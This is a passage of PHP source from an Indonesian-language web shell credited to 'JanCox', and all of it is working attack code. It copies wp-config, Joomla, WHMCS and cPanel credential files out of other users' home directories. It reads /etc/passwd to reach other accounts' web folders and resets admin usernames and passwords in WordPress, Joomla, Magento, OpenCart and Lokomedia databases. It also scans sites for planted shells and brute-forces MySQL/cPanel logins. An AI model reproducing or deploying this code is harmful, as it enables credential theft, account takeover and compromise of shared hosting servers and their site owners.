  2756.                     "/home2/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2757.                     "/home2/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2758.                     "/home2/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2759.                     "/home2/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2760.                     "/home2/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2761.                     "/home2/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2762.                     "/home2/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2763.                     "/home2/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2764.                     "/home2/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2765.                     "/home2/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2766.                     "/home2/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2767.                     "/home2/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2768.                     "/home2/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2769.                     "/home2/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2770.                     "/home2/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2771.                     "/home2/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2772.                     "/home2/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2773.                     "/home2/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2774.                     "/home2/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2775.                     "/home2/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2776.                     "/home2/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2777.                     "/home2/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2778.                     "/home2/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2779.                     "/home2/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2780.                     "/home2/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2781.                     "/home2/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  2782.                     "/home3/$user_cox/.my.cnf" => "cpanel",
  2783.                     "/home3/$user_cox/.accesshash" => "WHM-accesshash",
  2784.                     "/home3/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2785.                     "/home3/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2786.                     "/home3/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2787.                     "/home3/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
  2788.                     "/home3/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2789.                     "/home3/$user_cox/public_html/forum/config.php" => "phpBB",
  2790.                     "/home3/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2791.                     "/home3/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2792.                     "/home3/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2793.                     "/home3/$user_cox/public_html/admin/config.php" => "OpenCart",
  2794.                     "/home3/$user_cox/public_html/slconfig.php" => "Sitelok",
  2795.                     "/home3/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
  2796.                     "/home3/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2797.                     "/home3/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2798.                     "/home3/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2799.                     "/home3/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2800.                     "/home3/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2801.                     "/home3/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
  2802.                     "/home3/$user_cox/public_html/configuration.php" => "Joomla",                  
  2803.                     "/home3/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2804.                     "/home3/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2805.                     "/home3/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  2806.                     "/home3/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2807.                     "/home3/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2808.                     "/home3/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2809.                     "/home3/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2810.                     "/home3/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2811.                     "/home3/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2812.                     "/home3/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2813.                     "/home3/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2814.                     "/home3/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2815.                     "/home3/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2816.                     "/home3/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2817.                     "/home3/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2818.                     "/home3/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2819.                     "/home3/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2820.                     "/home3/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2821.                     "/home3/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2822.                     "/home3/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2823.                     "/home3/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2824.                     "/home3/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2825.                     "/home3/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2826.                     "/home3/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2827.                     "/home3/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2828.                     "/home3/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2829.                     "/home3/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2830.                     "/home3/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2831.                     "/home3/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2832.                     "/home3/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2833.                     "/home3/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2834.                     "/home3/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2835.                     "/home3/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2836.                     "/home3/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2837.                     "/home3/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2838.                     "/home3/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  2839.                     "/home3/$user_cox/public_html/wp-config.php" => "WordPress",
  2840.                     "/home3/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2841.                     "/home3/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2842.                     "/home3/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  2843.                     "/home3/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2844.                     "/home3/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2845.                     "/home3/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2846.                     "/home3/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2847.                     "/home3/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2848.                     "/home3/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2849.                     "/home3/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2850.                     "/home3/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2851.                     "/home3/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2852.                     "/home3/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2853.                     "/home3/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2854.                     "/home3/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2855.                     "/home3/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2856.                     "/home3/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2857.                     "/home3/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2858.                     "/home3/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2859.                     "/home3/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2860.                     "/home3/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2861.                     "/home3/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2862.                     "/home3/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2863.                     "/home3/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2864.                     "/home3/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2865.                     "/home3/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2866.                     "/home3/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2867.                     "/home3/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2868.                     "/home3/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2869.                     "/home3/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2870.                     "/home3/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2871.                     "/home3/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2872.                     "/home3/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2873.                     "/home3/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2874.                     "/home3/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2875.                     "/home3/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal"                   
  2876.                         ); 
  2877.                     foreach($grab_config as $config => $nama_config) {
  2878.                         $ambil_config = file_get_contents($config);
  2879.                         if($ambil_config == '') {
  2880.                         } else {
  2881.                             $file_config = fopen("cox_config/$user_cox-$nama_config.txt","w");
  2882.                             fputs($file_config,$ambil_config);
  2883.                         }
  2884.                     }
  2885.                 }      
  2886.             }
  2887.             echo "<center><a href='?dir=$dir/cox_config'><font color=lime>Done</font></a></center>";
  2888.             }else{
  2889.                
  2890.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  2891.         echo file_get_contents('/etc/passwd');
  2892.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  2893.         }
  2894. } elseif($_GET['do'] == 'jumping') {
  2895.     $i = 0;
  2896.     echo "<pre><div class='margin: 5px auto;'>";
  2897.     $etc = fopen("/etc/passwd", "r");
  2898.     while($passwd = fgets($etc)) {
  2899.         if($passwd == '' || !$etc) {
  2900.             echo "<font color=red>Can't read /etc/passwd</font>";
  2901.         } else {
  2902.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  2903.             foreach($user_jumping[1] as $user_idx_jump) {
  2904.                 $user_jumping_dir = "/home/$user_idx_jump/public_html";
  2905.                 if(is_readable($user_jumping_dir)) {
  2906.                     $i++;
  2907.                     $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  2908.                     if(is_writable($user_jumping_dir)) {
  2909.                         $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  2910.                     }
  2911.                     echo $jrw;
  2912.                     $domain_jump = file_get_contents("/etc/named.conf");   
  2913.                     if($domain_jump == '') {
  2914.                         echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2915.                     } else {
  2916.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2917.                         foreach($domains_jump[1] as $dj) {
  2918.                             $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2919.                             $user_jumping_url = $user_jumping_url['name'];
  2920.                             if($user_jumping_url == $user_idx_jump) {
  2921.                                 echo " => ( <u>$dj</u> )<br>";
  2922.                                 break;
  2923.                             }
  2924.                         }
  2925.                     }
  2926.                 }
  2927.             }
  2928.         }
  2929.     }
  2930.     if($i == 0) {
  2931.     } else {
  2932.         echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  2933.     }
  2934.     echo "</div></pre>";
  2935. } elseif($_GET['do'] == 'auto_edit_user') {
  2936.     if($_POST['hajar']) {
  2937.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2938.             echo "username atau password harus lebih dari 6 karakter";
  2939.         } else {
  2940.             $user_baru = $_POST['user_baru'];
  2941.             $pass_baru = md5($_POST['pass_baru']);
  2942.             $conf = $_POST['config_dir'];
  2943.             $scan_conf = scandir($conf);
  2944.             foreach($scan_conf as $file_conf) {
  2945.                 if(!is_file("$conf/$file_conf")) continue;
  2946.                 $config = file_get_contents("$conf/$file_conf");
  2947.                 if(preg_match("/JConfig|joomla/",$config)) {
  2948.                     $dbhost = ambilkata($config,"host = '","'");
  2949.                     $dbuser = ambilkata($config,"user = '","'");
  2950.                     $dbpass = ambilkata($config,"password = '","'");
  2951.                     $dbname = ambilkata($config,"db = '","'");
  2952.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  2953.                     $prefix = $dbprefix."users";
  2954.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2955.                     $db = mysql_select_db($dbname);
  2956.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2957.                     $result = mysql_fetch_array($q);
  2958.                     $id = $result['id'];
  2959.                     $site = ambilkata($config,"sitename = '","'");
  2960.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2961.                     echo "Config => ".$file_conf."<br>";
  2962.                     echo "CMS => Joomla<br>";
  2963.                     if($site == '') {
  2964.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2965.                     } else {
  2966.                         echo "Sitename => $site<br>";
  2967.                     }
  2968.                     if(!$update OR !$conn OR !$db) {
  2969.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2970.                     } else {
  2971.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2972.                     }
  2973.                     mysql_close($conn);
  2974.                 } elseif(preg_match("/WordPress/",$config)) {
  2975.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2976.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2977.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2978.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2979.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2980.                     $prefix = $dbprefix."users";
  2981.                     $option = $dbprefix."options";
  2982.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2983.                     $db = mysql_select_db($dbname);
  2984.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2985.                     $result = mysql_fetch_array($q);
  2986.                     $id = $result[ID];
  2987.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2988.                     $result2 = mysql_fetch_array($q2);
  2989.                     $target = $result2[option_value];
  2990.                     if($target == '') {
  2991.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2992.                     } else {
  2993.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2994.                     }
  2995.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2996.                     echo "Config => ".$file_conf."<br>";
  2997.                     echo "CMS => Wordpress<br>";
  2998.                     echo $url_target;
  2999.                     if(!$update OR !$conn OR !$db) {
  3000.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3001.                     } else {
  3002.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3003.                     }
  3004.                     mysql_close($conn);
  3005.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3006.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3007.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3008.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3009.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3010.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3011.                     $prefix = $dbprefix."admin_user";
  3012.                     $option = $dbprefix."core_config_data";
  3013.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3014.                     $db = mysql_select_db($dbname);
  3015.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3016.                     $result = mysql_fetch_array($q);
  3017.                     $id = $result[user_id];
  3018.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3019.                     $result2 = mysql_fetch_array($q2);
  3020.                     $target = $result2[value];
  3021.                     if($target == '') {
  3022.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3023.                     } else {
  3024.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3025.                     }
  3026.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3027.                     echo "Config => ".$file_conf."<br>";
  3028.                     echo "CMS => Magento<br>";
  3029.                     echo $url_target;
  3030.                     if(!$update OR !$conn OR !$db) {
  3031.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3032.                     } else {
  3033.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3034.                     }
  3035.                     mysql_close($conn);
  3036.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3037.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3038.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3039.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3040.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3041.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3042.                     $prefix = $dbprefix."user";
  3043.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3044.                     $db = mysql_select_db($dbname);
  3045.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3046.                     $result = mysql_fetch_array($q);
  3047.                     $id = $result[user_id];
  3048.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  3049.                     if($target == '') {
  3050.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3051.                     } else {
  3052.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3053.                     }
  3054.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3055.                     echo "Config => ".$file_conf."<br>";
  3056.                     echo "CMS => OpenCart<br>";
  3057.                     echo $url_target;
  3058.                     if(!$update OR !$conn OR !$db) {
  3059.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3060.                     } else {
  3061.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3062.                     }
  3063.                     mysql_close($conn);
  3064.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3065.                     $dbhost = ambilkata($config,'server = "','"');
  3066.                     $dbuser = ambilkata($config,'username = "','"');
  3067.                     $dbpass = ambilkata($config,'password = "','"');
  3068.                     $dbname = ambilkata($config,'database = "','"');
  3069.                     $prefix = "users";
  3070.                     $option = "identitas";
  3071.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3072.                     $db = mysql_select_db($dbname);
  3073.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3074.                     $result = mysql_fetch_array($q);
  3075.                     $target = $result[alamat_website];
  3076.                     if($target == '') {
  3077.                         $target2 = $result[url];
  3078.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3079.                         if($target2 == '') {
  3080.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3081.                         } else {
  3082.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  3083.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3084.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3085.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3086.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3087.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3088.                             } else {
  3089.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3090.                             }
  3091.                         }
  3092.                     } else {
  3093.                         $cek_login = file_get_contents("$target/adminweb/");
  3094.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3095.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3096.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3097.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3098.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3099.                         } else {
  3100.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3101.                         }
  3102.                     }
  3103.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3104.                     echo "Config => ".$file_conf."<br>";
  3105.                     echo "CMS => Lokomedia<br>";
  3106.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3107.                         echo $url_target2;
  3108.                     } else {
  3109.                         echo $url_target;
  3110.                     }
  3111.                     if(!$update OR !$conn OR !$db) {
  3112.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3113.                     } else {
  3114.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3115.                     }
  3116.                     mysql_close($conn);
  3117.                 }
  3118.             }
  3119.         }
  3120.     } else {
  3121.         echo "<center>
  3122.         <h1>Auto Edit User Config</h1>
  3123.         <form method='post'>
  3124.         DIR Config: <br>
  3125.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3126.         Set User & Pass: <br>
  3127.         <input type='text' name='user_baru' value='0x1999' placeholder='user_baru'><br>
  3128.         <input type='text' name='pass_baru' value='0x1999' placeholder='pass_baru'><br>
  3129.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  3130.         </form>
  3131.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3132.         ";
  3133.     }
  3134. }elseif($_GET['do'] == 'shelscan') {
  3135.     echo'<center><h2>Shell Finder</h2>
  3136. <form action="" method="post">
  3137. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  3138. <br>
  3139. <input name="scan" value="Start Scaning"  style="width: 215px;" type="submit">
  3140. </form><br>';
  3141. if (isset($_POST["scan"])) {  
  3142. $url = $_POST['traget'];
  3143. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  3144. echo "Result :<br />";
  3145. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  3146. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  3147. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  3148. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  3149. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  3150. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  3151. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  3152. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  3153. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  3154. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  3155. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  3156. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  3157. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  3158. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  3159. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  3160. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  3161. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  3162. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  3163. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  3164. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  3165. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  3166. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  3167. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  3168. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  3169. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  3170. foreach ($shells as $shell){
  3171. $headers = get_headers("$url$shell"); //
  3172. if (eregi('200', $headers[0])) {
  3173. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  3174. $dz = fopen('shells.txt', 'a+');
  3175. $suck = "$url$shell";
  3176. fwrite($dz, $suck."\n");
  3177. }
  3178. }
  3179. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  3180. }
  3181.    
  3182. }
  3183.  elseif($_GET['do'] == 'cpanel') {
  3184.     if($_POST['crack']) {
  3185.         $usercp = explode("\r\n", $_POST['user_cp']);
  3186.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3187.         $i = 0;
  3188.         foreach($usercp as $ucp) {
  3189.             foreach($passcp as $pcp) {
  3190.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3191.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3192.                     } else {
  3193.                         $_SESSION[$ucp] = "1";
  3194.                         $_SESSION[$pcp] = "1";
  3195.                         $i++;
  3196.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3197.                     }
  3198.                 }
  3199.             }
  3200.         }
  3201.         if($i == 0) {
  3202.         } else {
  3203.             echo "<br>Nemu ".$i." Cpanel by <font color=lime>JanCox</font>";
  3204.         }
  3205.     } else {
  3206.         echo "<center>
  3207.         <form method='post'>
  3208.         USER: <br>
  3209.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3210.         $_usercp = fopen("/etc/passwd","r");
  3211.         while($getu = fgets($_usercp)) {
  3212.             if($getu == '' || !$_usercp) {
  3213.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3214.             } else {
  3215.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3216.                 foreach($u[1] as $user_cp) {
  3217.                         if(is_dir("/home/$user_cp/public_html")) {
  3218.                             echo "$user_cp\n";
  3219.                     }
  3220.                 }
  3221.             }
  3222.         }
  3223.         echo "</textarea><br>
  3224.         PASS: <br>
